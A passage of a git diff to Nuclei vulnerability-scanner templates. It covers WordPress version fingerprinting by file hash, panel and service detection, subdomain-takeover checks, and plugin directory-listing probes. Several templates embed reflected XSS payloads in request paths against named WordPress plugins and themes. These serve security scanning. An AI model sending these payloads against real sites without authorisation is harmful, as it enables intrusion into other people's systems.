dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"9c5d52b7116f10e4f64a766649725752\" == md5(body))" - - type: dsl - name: 4.2.4 - 4.2.29 - dsl: - - "(\"6878c388ff6f0063e6c31d0d3b28ecdb\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.3 - dsl: - - "(\"e2fe94b081c4f0bb2e673b75b2d72b23\" == md5(body))" - - type: dsl - name: 4.0.2 - 4.1.32 - dsl: - - "(\"27f1093ab09c8fe7c9e5eeed62525b41\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.1 - dsl: - - "(\"c5307758e7cda56b18b721eaad458db6\" == md5(body))" - - type: dsl - name: 3.9.4 - 3.9.33 - dsl: - - "(\"1bf86ac908560d0942c89fa5bb260ac1\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.3 - dsl: - - "(\"e5ab45817f930b0542eb4efe964ca1d6\" == md5(body))" - - type: dsl - name: 3.8.6 - 3.8.33 - dsl: - - "(\"2dbeb77845c920d2a43089badf02558d\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.5 - dsl: - - "(\"8c02fa2ffa234c96ba76341532da142e\" == md5(body))" - - type: dsl - name: 3.7.6 - 3.7.33 - dsl: - - "(\"f8c1f1f9fdc67b64689ad8cb43bcd7de\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.5 - dsl: - - "(\"5e84057e24cd23183bafd40b381c8ad4\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"f93efefe6ca9c827a2ff395f6297cc16\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"7a8d1cf1023a40442ca8efc5c8bc6787\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"5169d979fee3b7679953b2b7f434910d\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.2 - dsl: - - "(\"6ab2461212b35857ae0c979439dd59f1\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"cb52510d41dbe0e748c6f2d4aaaf85ed\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"5b46976c3745c39d14e55e06067a8373\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"46a432b956c0aa599d0661076c636988\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"b8da6794ad8af3a4ffc0dab408d5a8a0\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"3a392ddb8a382f78215c8d3c5d34d422\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"88fd998db24c3ce51b47c2e00e95db67\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpview/editor_plugin.js" - matchers: - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"3498b476348ae4d361dc02e197203990\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"cd36cae0d297bfcc3bb4884f539d9840\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"ad896ee63ddc505b6e098f6d308fdcef\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"f01e2f651ed5d26422e4f5edbb3548aa\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/tinymce/plugins/wpdialogs/editor_plugin.js" - matchers: - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"7bb6e432495c6711766e3c395ee95b01\" == md5(body))" - - type: dsl - name: 3.2 - 3.6.1 - dsl: - - "(\"0f132c90124ed40d6df71f1d4fabe557\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"9530e2e519bd75ba1748656ee1d2aa12\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"c3385371567df30afda2c9a49129bb5e\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"8f4bf29880b0cccbddfdcf1688c93622\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/wp-fullscreen.min.js" - matchers: - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"d6a88a01bdc839e38c5a25c3533d32c4\" == md5(body))" - - type: dsl - name: 4.0 - 4.1.32 - dsl: - - "(\"3534e4ec4ef74d6a8daafa225c11c918\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"ae2adb4cebb8b6c3dd3cc87b51c5061a\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"a5f47f22759ae243dd731c1b8a7f0495\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"1431f5bb512892f9e9f39a8d7ece041c\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"e31f737d7be3c5c6014934ccd445b808\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"8d70b30ab1e79965258c2244cb06040a\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"fd051b6fe06fa0636fefa788eeec7725\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/revisions.min.js" - matchers: - - type: dsl - name: 4.8 - 5.2.9 - dsl: - - "(\"0886448d087ccc0cb432130320821f69\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"189a4d84349fe1f4dfa0ec48c82efb04\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"62b95e8d4f6d5dc32797b9f08339446e\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"3253906cffe4523bc05d0632af4c6af8\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"5cff0abc8bb329e36a744280b563e9da\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"06c4a5b77bd61413bc4b74d88bfe9012\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"32caf54248666d9ff6666ae57d66cc09\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"2e3fc3b910c3ffa7dd0bd1b939f955a0\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"53d6b76b1495528760964cb5414167df\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"d1587acf93ef6d0fc64758d984f50d56\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"dfd2373522730d2d80e1437af0e38df2\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"1fb7a1551bbc89fa0b13cf037997832c\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"540ab4f75671456980a28d78f48c8587\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/quicktags.min.js" - matchers: - - type: dsl - name: 4.8 - 5.0.11 - dsl: - - "(\"f371f1d8aef9c3cb12cbdfa97cf7bd2f\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"6a365c2fcd52566ae9fd3db9a28c673d\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"fa5d97a49168b7454a06fa0e195fce4d\" == md5(body))" - - type: dsl - name: 4.1 - 4.2.29 - dsl: - - "(\"0d7a0005ba6a1fa29037258ddd1a2034\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.0.32 - dsl: - - "(\"d8427236a194f26c0902c12b3235cc60\" == md5(body))" - - type: dsl - name: 3.9 - 4.0 - dsl: - - "(\"8dd40bc29c66e85694b8b55f8489238a\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"f1264b60d66121394ec5833588826155\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"5f7c8cb8f33b0e319d7ede4a8eb97ee3\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"3acba502428f381b73603c025c96b37a\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"d93d32c5f16e2b5169f5d2118cb58d08\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"ed0bdd8e94c8119ba32f0cccb0fa6ee3\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"8d703bfea23a93f5679e25d60ef16593\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"47c0382048df8a6ea5e976e3b33a630c\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"0afb211552df727de680e1ba9b67e4fb\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"29ee8f15afeff636713ca503e8a39250\" == md5(body))" diff --git a/nuclei-templates/Other/workresources-rdp-11382.yaml b/nuclei-templates/Other/workresources-rdp-11382.yaml deleted file mode 100644 index 111682d05f..0000000000 --- a/nuclei-templates/Other/workresources-rdp-11382.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: workresources-rdp - -info: - name: Work Resources RemoteApp and Desktop Connection - author: dhiyaneshDK - severity: info - metadata: - shodan-query: 'http.title:"RD Web Access"' - tags: panel,workresources - -requests: - - method: GET - path: - - '{{BaseURL}}/RDWeb/Pages/en-US/login.aspx' - - matchers-condition: and - matchers: - - type: word - words: - - 'Error: Unable to display RD Web Access' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/workresources-rdp.yaml b/nuclei-templates/Other/workresources-rdp.yaml new file mode 100644 index 0000000000..72e04c8f50 --- /dev/null +++ b/nuclei-templates/Other/workresources-rdp.yaml @@ -0,0 +1,20 @@ +id: workresources-rdp +info: + name: Work Resources RemoteApp and Desktop Connection + author: dhiyaneshDK + severity: info + metadata: + shodan-query: 'http.title:"RD Web Access"' + tags: panel,workresources +requests: + - method: GET + path: + - '{{BaseURL}}/RDWeb/Pages/en-US/login.aspx' + matchers-condition: and + matchers: + - type: word + words: + - 'Error: Unable to display RD Web Access' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/worksites-detection-11384.yaml b/nuclei-templates/Other/worksites-detection-11384.yaml deleted file mode 100644 index 5e20adc371..0000000000 --- a/nuclei-templates/Other/worksites-detection-11384.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: detect-worksites -info: - name: worksites.net service detection - author: melbadry9 - severity: info - tags: dns - reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites -dns: - - name: "{{FQDN}}" - type: A - class: inet - recursion: true - retries: 2 - matchers: - - type: word - words: - - "69.164.223.206" diff --git a/nuclei-templates/Other/worksites-detection.yaml b/nuclei-templates/Other/worksites-detection.yaml new file mode 100644 index 0000000000..e7e78bf54e --- /dev/null +++ b/nuclei-templates/Other/worksites-detection.yaml @@ -0,0 +1,20 @@ +id: detect-worksites +info: + name: Worksites.net Service Detection + author: melbadry9 + severity: info + description: A worksites.net service was detected. + reference: + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites + classification: + cwe-id: CWE-200 + tags: dns,service +dns: + - name: "{{FQDN}}" + type: A + matchers: + - type: word + words: + - "69.164.223.206" + +# Enhanced by mp on 2022/03/14 diff --git a/nuclei-templates/Other/worksites-takeover-11387.yaml b/nuclei-templates/Other/worksites-takeover-11387.yaml new file mode 100644 index 0000000000..ff7291e040 --- /dev/null +++ b/nuclei-templates/Other/worksites-takeover-11387.yaml @@ -0,0 +1,16 @@ +id: worksites-takeover +info: + name: worksites takeover detection + author: melbadry9 + severity: high + reference: + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites + tags: takeover +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: regex + regex: + - "(?:Company Not Found|you’re looking for doesn’t exist)" diff --git a/nuclei-templates/Other/worksites-takeover-11388.yaml b/nuclei-templates/Other/worksites-takeover-11388.yaml deleted file mode 100644 index ef3630b58e..0000000000 --- a/nuclei-templates/Other/worksites-takeover-11388.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: worksites-takeover -info: - name: worksites takeover detection - author: melbadry9 - severity: high - tags: takeover - reference: https://blog.melbadry9.xyz/dangling-dns/xyz-services/ddns-worksites -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: regex - regex: - - "(?:Company Not Found|you’re looking for doesn’t exist)" diff --git a/nuclei-templates/Other/wowza-streaming-engine-11395.yaml b/nuclei-templates/Other/wowza-streaming-engine-11395.yaml new file mode 100644 index 0000000000..3d40c90531 --- /dev/null +++ b/nuclei-templates/Other/wowza-streaming-engine-11395.yaml @@ -0,0 +1,20 @@ +id: wowza-streaming-engine +info: + name: Wowza Streaming Engine + author: dhiyaneshDK + severity: info + reference: + - https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/enginemanager/ftu/welcome.htm' + matchers-condition: and + matchers: + - type: word + words: + - 'Wowza Streaming Engine Manager' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wowza-streaming-engine-11397.yaml b/nuclei-templates/Other/wowza-streaming-engine-11397.yaml deleted file mode 100644 index 20093618e0..0000000000 --- a/nuclei-templates/Other/wowza-streaming-engine-11397.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wowza-streaming-engine - -info: - name: Wowza Streaming Engine - author: dhiyaneshDK - severity: info - reference: https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22 - tags: panel - -requests: - - method: GET - path: - - '{{BaseURL}}/enginemanager/ftu/welcome.htm' - - matchers-condition: and - matchers: - - type: word - words: - - 'Wowza Streaming Engine Manager' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-123contactform-plugin-listing-11402.yaml b/nuclei-templates/Other/wp-123contactform-plugin-listing-11402.yaml deleted file mode 100644 index e78615fb51..0000000000 --- a/nuclei-templates/Other/wp-123contactform-plugin-listing-11402.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: wp-123contactform-plugin-listing - -info: - name: WordPress 123ContactForm Plugin Directory Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html - - https://www.exploit-db.com/ghdb/6979 - tags: wordpress,listing,plugin - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/" - - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/123contactform-for-wordpress" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-123contactform-plugin-listing.yaml b/nuclei-templates/Other/wp-123contactform-plugin-listing.yaml new file mode 100644 index 0000000000..dc8fd403a8 --- /dev/null +++ b/nuclei-templates/Other/wp-123contactform-plugin-listing.yaml @@ -0,0 +1,24 @@ +id: wp-123contactform-plugin-listing +info: + name: WordPress 123ContactForm Plugin Directory Listing + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: | + - https://blog.sucuri.net/2021/01/critical-vulnerabilities-in-123contactform-for-wordpress-wordpress-plugin.html + - https://www.exploit-db.com/ghdb/6979 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/123contactform-for-wordpress/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "/123contactform-for-wordpress" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-adaptive-xss-11404.yaml b/nuclei-templates/Other/wp-adaptive-xss-11404.yaml index f297df178f..e7309e8bed 100644 --- a/nuclei-templates/Other/wp-adaptive-xss-11404.yaml +++ b/nuclei-templates/Other/wp-adaptive-xss-11404.yaml @@ -1,17 +1,26 @@ id: wp-adaptive-xss + info: - name: Adaptive Images < 0.6.69 - Reflected Cross-Site Scripting + name: WordPress Adaptive Images < 0.6.69 - Cross-Site Scripting author: dhiyaneshDK - severity: medium - description: The plugin does not sanitise and escape the REQUEST_URI before outputting it back in a page, leading to a Reflected Cross-Site Scripting issue + severity: high + description: WordPress Adaptive Images < 0.6.69 is susceptible to cross-site scripting because the plugin does not sanitize and escape the REQUEST_URI before outputting it back in a page. reference: - https://wpscan.com/vulnerability/eef137af-408c-481c-8493-afe6ee2105d0 - https://plugins.trac.wordpress.org/changeset/2655683 - tags: wordpress,xss,wp-plugin,wp -requests: + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N + cvss-score: 7.2 + cwe-id: CWE-79 + metadata: + max-request: 1 + tags: wpscan,wordpress,xss,wp-plugin,wp + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php/%3Cimg/src/onerror=alert(document.domain)%3E/?debug=true" + matchers-condition: and matchers: - type: word @@ -19,10 +28,14 @@ requests: - '' - 'Image' condition: and + - type: word part: header words: - 'text/html' + - type: status status: - 200 + +# digest: 4b0a00483046022100f7319034e7b3a0f07220e42333cfa37667e810389f7105c80fa33980daa1a743022100b72ce37cb64ee25a16dad01e5860ac1013c28754b0b0aa167b7c7d488783f735:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/wp-ambience-xss-11407.yaml b/nuclei-templates/Other/wp-ambience-xss-11407.yaml deleted file mode 100644 index 84fb6e9506..0000000000 --- a/nuclei-templates/Other/wp-ambience-xss-11407.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: wp-ambience-xss - -info: - name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.exploit-db.com/exploits/38568 - tags: wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-ambience-xss-11408.yaml b/nuclei-templates/Other/wp-ambience-xss-11408.yaml new file mode 100644 index 0000000000..d79af60651 --- /dev/null +++ b/nuclei-templates/Other/wp-ambience-xss-11408.yaml @@ -0,0 +1,24 @@ +id: wp-ambience-xss +info: + name: WordPress Theme Ambience - 'src' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://www.exploit-db.com/exploits/38568 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-arforms-listing-11418.yaml b/nuclei-templates/Other/wp-arforms-listing-11418.yaml deleted file mode 100644 index e223f9ef7d..0000000000 --- a/nuclei-templates/Other/wp-arforms-listing-11418.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: wp-arforms-listing -info: - name: WordPress Plugin Arforms Listing - author: pussycat0x - severity: info - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: - - https://www.exploit-db.com/ghdb/6424 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/arforms/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "wp-content/plugins/arforms/" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-arforms-listing.yaml b/nuclei-templates/Other/wp-arforms-listing.yaml new file mode 100644 index 0000000000..9cc330e796 --- /dev/null +++ b/nuclei-templates/Other/wp-arforms-listing.yaml @@ -0,0 +1,22 @@ +id: wp-arforms-listing +info: + name: WordPress Plugin Arforms Listing + author: pussycat0x + severity: info + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: https://www.exploit-db.com/ghdb/6424 + tags: wordpress,listing +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/arforms/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "wp-content/plugins/arforms/" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-armour-extended.yaml b/nuclei-templates/Other/wp-armour-extended.yaml new file mode 100644 index 0000000000..17be4434ff --- /dev/null +++ b/nuclei-templates/Other/wp-armour-extended.yaml @@ -0,0 +1,59 @@ +id: wp-armour-extended + +info: + name: > + WP Armour Extended <= 1.26 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/224bf516-fac7-492f-87b9-912472ca01c9?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/wp-armour-extended/" + google-query: inurl:"/wp-content/plugins/wp-armour-extended/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,wp-armour-extended,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-armour-extended/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-armour-extended" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.26') \ No newline at end of file diff --git a/nuclei-templates/Other/wp-church-admin-xss-11419.yaml b/nuclei-templates/Other/wp-church-admin-xss-11419.yaml new file mode 100644 index 0000000000..089b607075 --- /dev/null +++ b/nuclei-templates/Other/wp-church-admin-xss-11419.yaml @@ -0,0 +1,29 @@ +id: wp-church-admin-xss + +info: + name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + reference: https://packetstormsecurity.com/files/132034/WordPress-Church-Admin-0.800-Cross-Site-Scripting.html + tags: wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-church-admin-xss-11423.yaml b/nuclei-templates/Other/wp-church-admin-xss-11423.yaml deleted file mode 100644 index 7860ec3d0c..0000000000 --- a/nuclei-templates/Other/wp-church-admin-xss-11423.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wp-church-admin-xss -info: - name: WordPress Plugin church_admin - 'id' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://www.securityfocus.com/bid/54329/info - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3Cscript%3Ealert%28'{{randstr}}'%29%3C/script%3E" - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-code-snippets-xss.yaml b/nuclei-templates/Other/wp-code-snippets-xss-11425.yaml similarity index 100% rename from nuclei-templates/Other/wp-code-snippets-xss.yaml rename to nuclei-templates/Other/wp-code-snippets-xss-11425.yaml diff --git a/nuclei-templates/Other/wp-config-setup-11428.yaml b/nuclei-templates/Other/wp-config-setup.yaml similarity index 100% rename from nuclei-templates/Other/wp-config-setup-11428.yaml rename to nuclei-templates/Other/wp-config-setup.yaml diff --git a/nuclei-templates/Other/wp-custom-tables-xss-11431.yaml b/nuclei-templates/Other/wp-custom-tables-xss-11431.yaml deleted file mode 100644 index 958241da6b..0000000000 --- a/nuclei-templates/Other/wp-custom-tables-xss-11431.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: wp-custom-tables-xss - -info: - name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) - author: daffainfo - severity: medium - description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability - reference: https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 - tags: wordpress,xss,wp-plugin - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-custom-tables-xss-11435.yaml b/nuclei-templates/Other/wp-custom-tables-xss-11435.yaml new file mode 100644 index 0000000000..cae9eef28f --- /dev/null +++ b/nuclei-templates/Other/wp-custom-tables-xss-11435.yaml @@ -0,0 +1,26 @@ +id: wp-custom-tables-xss +info: + name: WordPress Custom Tables Plugin 3.4.4 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: WordPress custom tables Plugin 'key' Parameter Cross Site Scripting Vulnerability + reference: + - https://wpscan.com/vulnerability/211a4286-4747-4b62-acc3-fd9a57b06252 + tags: wordpress,xss,wp-plugin +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-detect (copy 1).yaml b/nuclei-templates/Other/wp-detect (copy 1).yaml deleted file mode 100644 index 5bd594901f..0000000000 --- a/nuclei-templates/Other/wp-detect (copy 1).yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: wp-detect -info: - name: WordPress Detection - author: foulenzer - severity: info -requests: - - method: GET - path: - - "{{BaseURL}}" - - redirects: true - max-redirects: 2 - matchers-condition: or - matchers: - - type: regex - name: wordpress - regex: - - ]+/wp-(?:content|includes)/ - - ]+s\d+\.wp\.com \ No newline at end of file diff --git a/nuclei-templates/Other/wp-detect.yaml b/nuclei-templates/Other/wp-detect.yaml new file mode 100644 index 0000000000..b3ee30585f --- /dev/null +++ b/nuclei-templates/Other/wp-detect.yaml @@ -0,0 +1,18 @@ +id: wp-detect +info: + name: WordPress Detection + author: foulenzer + severity: info +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + max-redirects: 2 + matchers-condition: or + matchers: + - type: regex + name: wordpress + regex: + - ]+/wp-(?:content|includes)/ + - ]+s\d+\.wp\.com diff --git a/nuclei-templates/Other/wp-email-subscribers-listing-11443.yaml b/nuclei-templates/Other/wp-email-subscribers-listing-11443.yaml new file mode 100644 index 0000000000..3752821e40 --- /dev/null +++ b/nuclei-templates/Other/wp-email-subscribers-listing-11443.yaml @@ -0,0 +1,23 @@ +id: wp-email-subscribers-listing +info: + name: WordPress Plugin Email Subscribers Listing + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the wordpress-plugins plugin. + reference: + - https://www.exploit-db.com/ghdb/6428 + tags: wordpress,listing,plugin +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/email-subscribers" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - "wp-content/plugins/email-subscribers" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/wp-email-subscribers-listing.yaml b/nuclei-templates/Other/wp-email-subscribers-listing.yaml deleted file mode 100644 index 2fbf8318f7..0000000000 --- a/nuclei-templates/Other/wp-email-subscribers-listing.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wp-email-subscribers-listing -info: - name: WordPress Plugin Email Subscribers Listing - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the wordpress-plugins plugin. - reference: https://www.exploit-db.com/ghdb/6428 - tags: wordpress,listing -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/email-subscribers" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "wp-content/plugins/email-subscribers" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-engine-config.yaml b/nuclei-templates/Other/wp-engine-config.yaml index 48abb2f116..c6db13b52d 100644 --- a/nuclei-templates/Other/wp-engine-config.yaml +++ b/nuclei-templates/Other/wp-engine-config.yaml @@ -5,7 +5,7 @@ info: author: SirBugs severity: high -http: +requests: - method: GET path: - "{{BaseURL}}/wpeprivate/config.json" diff --git a/nuclei-templates/Other/wp-finder-xss-11448.yaml b/nuclei-templates/Other/wp-finder-xss-11448.yaml deleted file mode 100644 index 0111970059..0000000000 --- a/nuclei-templates/Other/wp-finder-xss-11448.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: wp-finder-xss -info: - name: WordPress Plugin Finder - 'order' Reflected Cross-Site Scripting (XSS) - author: daffainfo - severity: medium - reference: https://packetstormsecurity.com/files/115902/WordPress-Finder-Cross-Site-Scripting.html - tags: wordpress,xss,wp-plugin -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/finder/index.php?by=type&dir=tv&order=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - matchers-condition: and - matchers: - - type: word - words: - - "" - part: body - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/wp-finder-xss-11449.yaml b/nuclei-templates/Other/wp-finder-xss-11449.yaml new file mode 100644 index 0000000000..76d5b6e588 --- /dev/null +++ 